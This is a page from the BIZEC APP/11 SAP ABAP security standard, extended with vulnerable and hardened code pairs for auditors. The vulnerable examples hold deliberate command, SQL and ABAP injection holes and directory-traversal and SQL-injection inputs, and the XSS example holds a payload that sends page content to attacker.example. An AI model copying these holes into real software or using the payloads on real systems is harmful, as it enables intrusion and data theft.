BIZEC APP11

From Bizec.org - The Business Security Community

BIZEC APP/11 (V2.0)

The BIZEC APP/11 standard comprises the most critical and the most common security defects in SAP ABAP applications. Its purpose is to give companies that plan to conduct ABAP code audits guidance on which types of security defects an audit should cover at a minimum.

This updated list (V2.0) was created based on (static) code analysis of more than 100 million lines of custom ABAP code from 50 different companies, conducted by BIZEC members. The absolute frequency of (dangerous) findings was used as the basis for the new APP/11 standard.

The BIZEC APP/11 standard is composed of two sections: A "Critical" section at the top and a "Common" section below.

The "Critical" section lists types of security defects where a single vulnerability would result in complete compromise of the SAP server. These types of defects must be in the test scope of every ABAP code audit.

The "Common" section lists dangerous types of security defects that are most commonly observed in custom ABAP code in the order of their absolute frequency in the analyzed code base.

Experts who contributed to the BIZEC APP/11 (V2.0) standard (alphabetical order):

  • Roswitha MacLean, Security Expert Application Security, Daimler
  • Reinhard Schneider, Application Development and Maintenance Team Lead, Knauf Information Services
  • Markus Seibel, SAP Security Lead, General Motors
  • Juergen Wachter, SAP Senior Consultant, comgroup
  • Andreas Wiegenstein, CTO, Virtual Forge

Please note that all listed types of defects pose a high threat to the security of every SAP business scenario.

If you have questions regarding the BIZEC APP/11 standard (V2.0), please contact BIZEC.

BIZEC APP/11 Version 2.0 - October 2012

APP-01 ABAP Command Injection (Critical)
Coding that dynamically creates and executes ABAP programs based on user input on a productive system, bypassing SE80 and the concept of a three-tier system landscape (development, quality assurance, production).
Violates: PG-1, PG-2, PG-3, PG-4, PG-5, PG-6, PG-7
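The following is an added example to illustrate APP-01; it is not code from BIZEC or from the standard itself, and the program, routine and action names are assumed for the demonstration. The vulnerable FORM compiles whatever the user typed into a temporary subroutine pool and runs it (INSERT REPORT is the other common vector); the hardened FORM never generates source at all and only dispatches to routines that went through the normal development and transport path.

```abap
REPORT z_app01_code_injection.

" Constructed demo: both variants take a text from the selection screen.
PARAMETERS p_act TYPE c LENGTH 255 LOWER CASE.

" --- Vulnerable: user input is compiled into a temporary program and executed.
" Any ABAP statement typed into P_ACT runs with the caller's authorizations on
" the productive system, never passes SE80, review or transport, and leaves no
" source behind once the session ends.
FORM run_vulnerable USING iv_input TYPE clike.
  DATA: lt_src  TYPE TABLE OF string,
        lv_prog TYPE syrepid,
        lv_msg  TYPE string.

  APPEND 'PROGRAM zgen_tmp.'   TO lt_src.
  APPEND 'FORM main.'          TO lt_src.
  APPEND |  { iv_input }|      TO lt_src.   " e.g. DELETE FROM usr02 WHERE bname = 'DDIC'.
  APPEND 'ENDFORM.'            TO lt_src.

  GENERATE SUBROUTINE POOL lt_src NAME lv_prog MESSAGE lv_msg.
  IF sy-subrc = 0.
    PERFORM main IN PROGRAM (lv_prog).
  ENDIF.
ENDFORM.

" --- Hardened: no source is generated from input. The input only selects one
" of a closed set of routines that were written, reviewed and transported in
" the normal way; anything else is refused.
FORM run_hardened USING iv_input TYPE clike.
  CASE iv_input.
    WHEN 'EXPORT_REPORT'.
      PERFORM export_report.
    WHEN 'REBUILD_INDEX'.
      PERFORM rebuild_index.
    WHEN OTHERS.
      MESSAGE e001(00) WITH 'Unknown action' iv_input.
  ENDCASE.
ENDFORM.

FORM export_report.
  " reviewed business logic (assumed) lives here
ENDFORM.

FORM rebuild_index.
  " reviewed business logic (assumed) lives here
ENDFORM.

START-OF-SELECTION.
  PERFORM run_hardened USING p_act.
```

In an audit, every occurrence of GENERATE SUBROUTINE POOL, INSERT REPORT and GENERATE REPORT should be traced back to see whether any part of the generated source is derived from input, a database table or a file; a CASE or equivalent whitelist as above is the only pattern that makes the question moot.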
APP-02 OS Command Injection (Critical)
Coding that executes arbitrary (input-based) commands on the operating system, bypassing the allowed commands specified in transaction SM49/SM69 and S_LOG_COM authorizations.
Violates: PG-6, PG-7
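An added example for APP-02 (not BIZEC's code; the program name and the SM69 command ZLIST_DIR are assumed). The vulnerable FORM builds a shell command line from input and hands it to the kernel with CALL 'SYSTEM', which performs no S_LOG_COM check and ignores SM49/SM69. The hardened FORM validates the input, then runs only an externally defined command through SXPG_COMMAND_EXECUTE, which checks S_LOG_COM and rejects parameters containing shell metacharacters (exception SECURITY_RISK).

```abap
REPORT z_app02_os_command.

PARAMETERS p_dir TYPE c LENGTH 100 LOWER CASE.

TYPES ty_line TYPE c LENGTH 255.

" --- Vulnerable: P_DIR = '/tmp; cat /etc/passwd' runs two commands on the
" application server with the <sid>adm user's rights.
FORM list_vulnerable USING iv_dir TYPE clike.
  DATA: lv_cmd TYPE ty_line,
        lt_out TYPE TABLE OF ty_line.

  lv_cmd = |ls -l { iv_dir }|.
  CALL 'SYSTEM' ID 'COMMAND' FIELD lv_cmd
                ID 'TAB'     FIELD lt_out.
ENDFORM.

" --- Hardened: only the SM69 command ZLIST_DIR (assumed to be defined as
" "ls -l" with additional parameters allowed) can run, and the caller needs
" S_LOG_COM for it. The input is still validated first: a single absolute
" path, no separators, redirects, substitutions or whitespace.
FORM list_hardened USING iv_dir TYPE clike.
  DATA: lv_dir      TYPE string,
        lv_params   TYPE sxpgcolist-parameters,
        lv_status   TYPE extcmdexex-status,
        lt_protocol TYPE TABLE OF btcxpm.

  lv_dir = iv_dir.                      " string: no trailing blanks to worry about
  IF lv_dir IS INITIAL
     OR lv_dir CA ' ;|&`$<>()*?'
     OR lv_dir NP '/*'.
    MESSAGE e001(00) WITH 'Invalid directory' lv_dir.
  ENDIF.
  lv_params = lv_dir.

  CALL FUNCTION 'SXPG_COMMAND_EXECUTE'
    EXPORTING
      commandname                = 'ZLIST_DIR'
      additional_parameters      = lv_params
    IMPORTING
      status                     = lv_status
    TABLES
      exec_protocol              = lt_protocol
    EXCEPTIONS
      no_permission              = 1
      command_not_found          = 2
      parameters_too_long        = 3
      security_risk              = 4
      wrong_check_call_interface = 5
      program_start_error        = 6
      program_termination_error  = 7
      x_error                    = 8
      parameter_expected         = 9
      too_many_parameters        = 10
      illegal_command            = 11
      OTHERS                     = 12.
  IF sy-subrc <> 0.
    MESSAGE e001(00) WITH 'Command refused or failed, rc' sy-subrc.
  ENDIF.
  " ... lt_protocol holds the command output
ENDFORM.

START-OF-SELECTION.
  PERFORM list_hardened USING p_dir.
```

Note that SXPG_COMMAND_EXECUTE only helps when the SM69 entry is narrow: a command defined as "sh" or "cmd.exe" with parameters allowed reintroduces the original problem, so the audit should look at the command definitions as well as the ABAP.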
APP-03 Native SQL Injection (Critical)
Coding that executes arbitrary (input-based) native SQL commands on the SAP database, bypassing any Open SQL restriction.
Violates: PG-1, PG-2, PG-4, PG-6, PG-7
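An added example for APP-03 using ADBC (cl_sql_statement); it is not BIZEC's code and the program name is assumed. Native SQL goes to the database verbatim: no automatic client condition, no table-access authorization, no restriction to one statement. The vulnerable FORM concatenates input into the statement text; the hardened FORM keeps the statement constant and binds values as parameters.

```abap
REPORT z_app03_native_sql.

PARAMETERS p_user TYPE c LENGTH 12.

TYPES: BEGIN OF ty_row,
         bname TYPE usr02-bname,
         uflag TYPE usr02-uflag,
       END OF ty_row.

" --- Vulnerable: P_USER = X' OR '1'='1 turns the WHERE clause into
" BNAME = 'X' OR '1'='1' and returns every user of the client; any other
" table of the database is reachable the same way.
FORM read_vulnerable USING iv_user TYPE clike.
  DATA: lo_stmt TYPE REF TO cl_sql_statement,
        lo_res  TYPE REF TO cl_sql_result_set,
        ls_row  TYPE ty_row,
        lv_user TYPE string,
        lv_sql  TYPE string.

  lv_user = iv_user.
  lv_sql  = |SELECT BNAME, UFLAG FROM USR02 | &&
            |WHERE MANDT = '{ sy-mandt }' AND BNAME = '{ lv_user }'|.
  TRY.
      CREATE OBJECT lo_stmt.
      lo_res = lo_stmt->execute_query( lv_sql ).
      lo_res->set_param_struct( REF #( ls_row ) ).
      WHILE lo_res->next( ) > 0.
        " ... process ls_row
      ENDWHILE.
      lo_res->close( ).
    CATCH cx_sql_exception.
      MESSAGE e001(00) WITH 'Database error'.
  ENDTRY.
ENDFORM.

" --- Hardened: the SQL text is a literal; the client and the user name are
" bound as parameters (?), so input can only ever be data, never syntax.
" The client must still be supplied explicitly: native SQL does not add it.
FORM read_hardened USING iv_user TYPE clike.
  DATA: lo_stmt  TYPE REF TO cl_sql_statement,
        lo_res   TYPE REF TO cl_sql_result_set,
        ls_row   TYPE ty_row,
        lv_mandt TYPE sy-mandt,
        lv_user  TYPE usr02-bname.

  lv_mandt = sy-mandt.
  lv_user  = iv_user.
  TRY.
      CREATE OBJECT lo_stmt.
      lo_stmt->set_param( REF #( lv_mandt ) ).
      lo_stmt->set_param( REF #( lv_user ) ).
      lo_res = lo_stmt->execute_query(
        `SELECT BNAME, UFLAG FROM USR02 WHERE MANDT = ? AND BNAME = ?` ).
      lo_res->set_param_struct( REF #( ls_row ) ).
      WHILE lo_res->next( ) > 0.
        " ... process ls_row
      ENDWHILE.
      lo_res->close( ).
    CATCH cx_sql_exception.
      MESSAGE e001(00) WITH 'Database error'.
  ENDTRY.
ENDFORM.

START-OF-SELECTION.
  PERFORM read_hardened USING p_user.
```

The same rule applies to EXEC SQL ... ENDEXEC: host variables (:lv_user) are bound, string-built statements are not. Even the parameterised version bypasses S_TABU_NAM and the client barrier, so the audit should also ask why native SQL was needed at all.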
APP-04 Improper Authorization: Missing, Broken, Proprietary, Generic (Common)
Coding that does not (properly) perform authorization checks based on the SAP standard for critical operations. Improper Authorization includes semantically incorrect authority checks, generic authority checks, missing authority checks as well as proprietary authorization checks.
Violates: PG-3 (implicitly PG-1, PG-2)

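An added example for APP-04 showing the four improper variants named above next to a correct check; this is not BIZEC's code, the program name is assumed, and F_BKPF_BUK (company code in accounting document) is a standard authorization object used here for illustration.

```abap
REPORT z_app04_authorization.

PARAMETERS p_bukrs TYPE bkpf-bukrs.

" 1. Missing: the critical read is not protected at all.
FORM show_missing USING iv_bukrs TYPE bkpf-bukrs.
  PERFORM read_documents USING iv_bukrs.
ENDFORM.

" 2. Broken (semantically incorrect): the check runs, but sy-subrc is never
"    evaluated, so every caller passes.
FORM show_broken USING iv_bukrs TYPE bkpf-bukrs.
  AUTHORITY-CHECK OBJECT 'F_BKPF_BUK'
    ID 'BUKRS' FIELD iv_bukrs
    ID 'ACTVT' FIELD '03'.
  PERFORM read_documents USING iv_bukrs.
ENDFORM.

" 3. Generic: DUMMY skips the value comparison. Any user holding any
"    F_BKPF_BUK authorization passes for any company code and any activity.
FORM show_generic USING iv_bukrs TYPE bkpf-bukrs.
  AUTHORITY-CHECK OBJECT 'F_BKPF_BUK'
    ID 'BUKRS' DUMMY
    ID 'ACTVT' DUMMY.
  IF sy-subrc = 0.
    PERFORM read_documents USING iv_bukrs.
  ENDIF.
ENDFORM.

" 4. Proprietary: a home-grown rule replaces the role-based concept. It is
"    invisible to SU53/SUIM, cannot be administered in PFCG and breaks as
"    soon as a user is renamed or leaves.
FORM show_proprietary USING iv_bukrs TYPE bkpf-bukrs.
  IF sy-uname = 'FI_ADMIN' OR sy-uname CS 'AUDIT'.
    PERFORM read_documents USING iv_bukrs.
  ENDIF.
ENDFORM.

" Correct: standard object, every field compared against the actual value,
" sy-subrc evaluated, hard stop on failure.
FORM show_correct USING iv_bukrs TYPE bkpf-bukrs.
  AUTHORITY-CHECK OBJECT 'F_BKPF_BUK'
    ID 'BUKRS' FIELD iv_bukrs
    ID 'ACTVT' FIELD '03'.        " 03 = display
  IF sy-subrc <> 0.
    MESSAGE e001(00) WITH 'No display authorization for company code' iv_bukrs.
  ENDIF.
  PERFORM read_documents USING iv_bukrs.
ENDFORM.

FORM read_documents USING iv_bukrs TYPE bkpf-bukrs.
  DATA lt_belnr TYPE TABLE OF bkpf-belnr.
  SELECT belnr FROM bkpf INTO TABLE lt_belnr WHERE bukrs = iv_bukrs.
  " ... display lt_belnr
ENDFORM.

START-OF-SELECTION.
  PERFORM show_correct USING p_bukrs.
```

Static analysis finds variants 2 and 3 reliably (AUTHORITY-CHECK without a following sy-subrc test; DUMMY on a field that carries the restricted value). Variants 1 and 4 require knowing which operations are critical, which is why the audit scope should list the business objects a custom program touches and the standard authorization object expected for each.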
APP-05 Directory Traversal (Common)
Coding that performs server-side file/directory read/write access, where a file name or path is (partially) based on unvalidated user input. Such coding gives attackers read/write access to restricted files, e.g. OS configuration, SAP configuration and temporarily stored business data.
Violates: PG-1, PG-6, PG-7
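An added example for APP-05 (not BIZEC's code; the program name, the base directory /usr/sap/trans/data and the logical file name Z_APP05_INBOUND maintained in transaction FILE are assumed). The vulnerable FORM appends input to a directory, which ../ sequences walk out of; the hardened FORM reduces the input to a plain file name with a character whitelist and then has the resulting path validated against a logical file name with FILE_VALIDATE_NAME, so the permitted directory is enforced centrally rather than per program.

```abap
REPORT z_app05_directory_traversal.

PARAMETERS p_name TYPE c LENGTH 60 LOWER CASE.

" --- Vulnerable: P_NAME = '../../../../etc/passwd' or
" '../../<SID>/SYS/profile/DEFAULT.PFL' leaves the intended directory. The
" implicit S_DATASET check on OPEN DATASET rarely helps: it is usually
" granted with '*' for the file name.
FORM read_vulnerable USING iv_name TYPE clike.
  DATA: lv_path TYPE string,
        lv_line TYPE string.

  lv_path = |/usr/sap/trans/data/{ iv_name }|.
  OPEN DATASET lv_path FOR INPUT IN TEXT MODE ENCODING DEFAULT.
  IF sy-subrc = 0.
    DO.
      READ DATASET lv_path INTO lv_line.
      IF sy-subrc <> 0. EXIT. ENDIF.
      " ... process lv_line
    ENDDO.
    CLOSE DATASET lv_path.
  ENDIF.
ENDFORM.

" --- Hardened: whitelist the characters of a bare file name, reject '..',
" build the path server-side, then validate it against the logical file name.
FORM read_hardened USING iv_name TYPE clike.
  DATA: lv_name TYPE string,
        lv_path TYPE string,
        lv_line TYPE string.

  lv_name = iv_name.                    " string: trailing blanks removed
  IF lv_name IS INITIAL
     OR lv_name CN 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-.'
     OR lv_name CS '..'.
    MESSAGE e001(00) WITH 'Invalid file name' lv_name.
  ENDIF.

  lv_path = |/usr/sap/trans/data/{ lv_name }|.

  " Z_APP05_INBOUND (assumed) defines the physical pattern in transaction
  " FILE; a path outside that pattern fails validation.
  CALL FUNCTION 'FILE_VALIDATE_NAME'
    EXPORTING
      logical_filename           = 'Z_APP05_INBOUND'
    CHANGING
      physical_filename          = lv_path
    EXCEPTIONS
      logical_filename_not_found = 1
      validation_failed          = 2
      OTHERS                     = 3.
  IF sy-subrc <> 0.
    MESSAGE e001(00) WITH 'File name rejected' lv_name.
  ENDIF.

  OPEN DATASET lv_path FOR INPUT IN TEXT MODE ENCODING DEFAULT.
  IF sy-subrc <> 0.
    MESSAGE e001(00) WITH 'Cannot open' lv_path.
  ENDIF.
  DO.
    READ DATASET lv_path INTO lv_line.
    IF sy-subrc <> 0. EXIT. ENDIF.
    " ... process lv_line
  ENDDO.
  CLOSE DATASET lv_path.
ENDFORM.

START-OF-SELECTION.
  PERFORM read_hardened USING p_name.
```

The whitelist alone is not sufficient on its own if the base directory itself comes from a parameter or a customizing table, which is the usual way the same defect reappears in "configurable" programs; FILE_VALIDATE_NAME catches that case too because it validates the final physical path.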
APP-06 Direct Database Modifications (Common)
Coding that directly modifies (restricted) database tables of the SAP standard without proper authorization, bypassing the S_TABU_DIS, S_TABU_NAM and S_TABU_CLI authorizations.
Violates: PG-2
APP-07 Cross-Client Database Access (Common)
Coding that accesses business data on a different client, bypassing the SAP client separation mechanism.
Violates: PG-5 (implicitly PG-1, PG-2, PG-3, PG-4)
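One added example covers both APP-06 and APP-07, since the two defects usually appear together: a direct write to a standard customizing table (T001, company codes) in a foreign client. This is not BIZEC's code; the program name is assumed, and gating the cross-client read on S_TABU_CLI is a design choice made here for illustration, not a rule the standard states. The hardened write stays in the caller's client and asks VIEW_AUTHORITY_CHECK, the function the SAP table maintenance uses, for the same S_TABU_DIS/S_TABU_NAM decision SM30 would make.

```abap
REPORT z_app06_07_direct_db.

PARAMETERS: p_bukrs TYPE t001-bukrs,
            p_butxt TYPE t001-butxt LOWER CASE.

" --- Vulnerable: UPDATE performs no S_TABU_DIS/S_TABU_NAM check, CLIENT
" SPECIFIED switches the automatic client condition off, and neither change
" documents nor table logging are written. Client 000 is the SAP reference
" client, so this rewrites customizing every other client may be copied from.
FORM rename_vulnerable USING iv_bukrs TYPE t001-bukrs
                             iv_butxt TYPE t001-butxt.
  UPDATE t001 CLIENT SPECIFIED
    SET butxt = iv_butxt
    WHERE mandt = '000' AND bukrs = iv_bukrs.
ENDFORM.

" --- Hardened write: own client only, and the caller must hold the table
" maintenance authorization (S_TABU_DIS for the table's group or S_TABU_NAM
" for the table itself) before the statement runs.
FORM rename_hardened USING iv_bukrs TYPE t001-bukrs
                           iv_butxt TYPE t001-butxt.
  CALL FUNCTION 'VIEW_AUTHORITY_CHECK'
    EXPORTING
      view_action                    = 'U'      " update
      view_name                      = 'T001'
    EXCEPTIONS
      invalid_action                 = 1
      no_authority                   = 2
      no_clientindependent_authority = 3
      no_linedependent_authority     = 4
      table_not_found                = 5
      OTHERS                         = 6.
  IF sy-subrc <> 0.
    MESSAGE e001(00) WITH 'No change authorization for table T001'.
  ENDIF.

  UPDATE t001 SET butxt = iv_butxt WHERE bukrs = iv_bukrs.
  IF sy-subrc <> 0.
    MESSAGE e001(00) WITH 'Company code' iv_bukrs 'not found'.
  ENDIF.
ENDFORM.

" --- Cross-client read, if a program genuinely needs one (system
" administration tooling, not business logic): make the client explicit and
" gate it on S_TABU_CLI, the standard object for cross-client table access.
FORM read_other_client USING iv_mandt TYPE sy-mandt
                             iv_bukrs TYPE t001-bukrs.
  DATA ls_t001 TYPE t001.

  AUTHORITY-CHECK OBJECT 'S_TABU_CLI'
    ID 'CLIIDMAINT' FIELD 'X'.
  IF sy-subrc <> 0.
    MESSAGE e001(00) WITH 'No cross-client table authorization'.
  ENDIF.

  SELECT SINGLE * FROM t001 CLIENT SPECIFIED INTO ls_t001
    WHERE mandt = iv_mandt AND bukrs = iv_bukrs.
  " ... use ls_t001
ENDFORM.

START-OF-SELECTION.
  PERFORM rename_hardened USING p_bukrs p_butxt.
```

For the audit, every CLIENT SPECIFIED (and every EXEC SQL/ADBC statement, which never has a client condition) is a finding until a business reason and an authorization check are documented; direct UPDATE/MODIFY/DELETE on SAP standard tables should additionally be compared against the available maintenance views and BAPIs, which the hardened FORM above still does not replace.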
APP-08 Open SQL Injection (Common)
Coding that makes use of dynamic Open SQL, where part of such a query is based on input. This defect enables malicious users to alter the SQL query in order to access restricted data without authorization.
Violates: PG-5 (implicitly PG-1, PG-2, PG-3, PG-4)
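An added example for APP-08 (not BIZEC's code; the program name is assumed). Open SQL still adds the client condition and refuses a second statement, so the damage is confined to the query itself, but a dynamic WHERE clause built from input lets the caller widen the result set to the whole table or choose which column is filtered. The hardened FORM validates the column against a closed list and quotes the value with cl_abap_dyn_prg=>quote, which wraps it in single quotes and doubles any quote inside it.

```abap
REPORT z_app08_open_sql_injection.

PARAMETERS: p_bname TYPE c LENGTH 40 LOWER CASE,
            p_field TYPE c LENGTH 30.

TYPES ty_users TYPE TABLE OF usr02-bname.

" --- Vulnerable: P_BNAME = X' OR BNAME <> 'Z yields the clause
" BNAME = 'X' OR BNAME <> 'Z' and returns every user; P_FIELD lets the
" caller filter on any column of USR02, including ones never meant to be
" exposed (e.g. password hash fields on older releases).
FORM find_vulnerable USING iv_bname TYPE clike
                           iv_field TYPE clike
                     CHANGING ct_users TYPE ty_users.
  DATA lv_where TYPE string.
  lv_where = |{ iv_field } = '{ iv_bname }'|.
  SELECT bname FROM usr02 INTO TABLE ct_users WHERE (lv_where).
ENDFORM.

" --- Hardened: the column name is checked against a whitelist, the value
" is quoted so it cannot close the literal, and nothing else from the
" caller reaches the clause.
FORM find_hardened USING iv_bname TYPE clike
                         iv_field TYPE clike
                   CHANGING ct_users TYPE ty_users.
  DATA: lv_field TYPE string,
        lv_where TYPE string.

  lv_field = iv_field.
  CASE lv_field.
    WHEN 'BNAME' OR 'CLASS' OR 'USTYP'.
      " permitted search columns of USR02
    WHEN OTHERS.
      MESSAGE e001(00) WITH 'Unsupported search field' lv_field.
  ENDCASE.

  lv_where = |{ lv_field } = { cl_abap_dyn_prg=>quote( iv_bname ) }|.
  SELECT bname FROM usr02 INTO TABLE ct_users WHERE (lv_where).
ENDFORM.

" --- Static variant: the default choice whenever the column is fixed. The
" value travels as a host variable and can never alter the statement.
FORM find_static USING iv_bname TYPE usr02-bname
                 CHANGING ct_users TYPE ty_users.
  SELECT bname FROM usr02 INTO TABLE ct_users WHERE bname = iv_bname.
ENDFORM.

START-OF-SELECTION.
  DATA lt_users TYPE ty_users.
  PERFORM find_hardened USING p_bname p_field CHANGING lt_users.
  " ... display lt_users
```

Dynamic table names (SELECT ... FROM (lv_table)), column lists and ORDER BY clauses are the same defect in a different position; cl_abap_dyn_prg also offers check_table_name_str and check_column_name for those, but a CASE over the handful of names a program really needs is easier to audit.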
APP-09 Generic Module Execution (Common)
Coding that allows uncontrolled execution of SAP standard business modules. The SAP standard provides a large number of business modules in the basis as well as the business suite. Direct execution of these modules is normally restricted by SAP standard security features, e.g. the authorizations required to run them via transactions SE37, SE38/SA38 and SE80. Custom coding that executes a caller-supplied function module, report or transaction name circumvents these restrictions.
Violates: PG-3 (implicitly PG-1, PG-2)
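An added example for APP-09 (not BIZEC's code; the program name and the two Z_ function modules are assumed). A dynamic CALL FUNCTION with a caller-supplied name is a generic execution facility: the only barrier to calling a user-maintenance or password-reset module is whether the user can start this report, and many function modules carry no authorization check of their own. The hardened FORM treats the name as an index into a closed list.

```abap
REPORT z_app09_generic_execution.

PARAMETERS p_fname TYPE rs38l_fnam.

" --- Vulnerable: whatever the caller types is executed. SE37 would at
" least demand S_DEVELOP; this report demands nothing.
FORM call_vulnerable USING iv_fname TYPE rs38l_fnam.
  CALL FUNCTION iv_fname.
ENDFORM.

" --- Hardened: the name must be one of a reviewed set. The modules listed
" here are assumed to carry their own AUTHORITY-CHECKs; the whitelist only
" prevents the report from becoming a universal launcher.
FORM call_hardened USING iv_fname TYPE rs38l_fnam.
  CASE iv_fname.
    WHEN 'Z_EXPORT_STOCK_REPORT' OR 'Z_REBUILD_PRICE_INDEX'.
      CALL FUNCTION iv_fname.
    WHEN OTHERS.
      MESSAGE e001(00) WITH 'Function module not permitted' iv_fname.
  ENDCASE.
ENDFORM.

START-OF-SELECTION.
  PERFORM call_hardened USING p_fname.
```

The same pattern applies to SUBMIT (lv_prog), CALL TRANSACTION lv_tcode and dynamic CALL METHOD: whitelist the target first, and for transactions use CALL TRANSACTION ... WITH AUTHORITY-CHECK (available from ABAP 7.40) or function AUTHORITY_CHECK_TCODE so that S_TCODE is evaluated as it would be from the menu.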
APP-10 Cross-Site Scripting (Common)
(BSP) Coding that does not properly encode data before rendering it as HTML. Cross-Site Scripting (XSS) attacks are targeted at users that run business applications in Web browsers. An XSS vulnerability compromises the security of the attacked user's client system, affecting any active SAP sessions.
Violates: PG-1, PG-2, PG-3, PG-4, PG-5, PG-6, PG-7
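An added example for APP-10 (not BIZEC's code; the program name and the payload are constructed for the demonstration). The markup is assembled in ABAP so the encoding is visible; in a BSP layout the vulnerable line corresponds to <%= name %>, whose output is not encoded unless the page attribute forceEncode is set. The hardened FORM uses the built-in escape( ) with a format per output context, because text content, attribute values and JavaScript strings each need different rules.

```abap
REPORT z_app10_xss.

" Constructed input: what a user typed into a "display name" field.
CONSTANTS gc_payload TYPE string
  VALUE `<img src=x onerror="fetch('https://attacker.example/?u='+encodeURIComponent(document.body.innerHTML))">`.

" --- Vulnerable: the value lands in the page as markup. The browser runs the
" injected handler in the origin of the SAP application, so it can read the
" page, submit forms and issue requests within the user's active session.
FORM render_vulnerable USING iv_name TYPE string
                       CHANGING cv_html TYPE string.
  cv_html = |<p>Welcome, { iv_name }</p>|
         && |<input type="text" name="display" value="{ iv_name }">|.
ENDFORM.

" --- Hardened: encode for the exact context the value is written into.
FORM render_hardened USING iv_name TYPE string
                     CHANGING cv_html TYPE string.
  cv_html = |<p>Welcome, { escape( val = iv_name format = cl_abap_format=>e_html_text ) }</p>|
         && |<input type="text" name="display" value="{ escape( val = iv_name format = cl_abap_format=>e_html_attr ) }">|
         && |<script>var who = '{ escape( val = iv_name format = cl_abap_format=>e_html_js ) }';</script>|.
ENDFORM.

START-OF-SELECTION.
  DATA lv_html TYPE string.
  PERFORM render_hardened USING gc_payload CHANGING lv_html.
  " lv_html now starts with <p>Welcome, &lt;img src=x onerror=... and
  " contains no executable markup
  WRITE lv_html.
```

cl_http_utility=>escape_html( ) covers the text context only; it is not sufficient inside attributes or script blocks, which is where most BSP findings of this type sit. Encoding on output, as above, is preferable to filtering on input, because the same value is usually rendered in several contexts.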
APP-11 Obscure ABAP Code (Common)
Any coding that uses stealth techniques in order to obscure its true purpose.
Violates: PG-4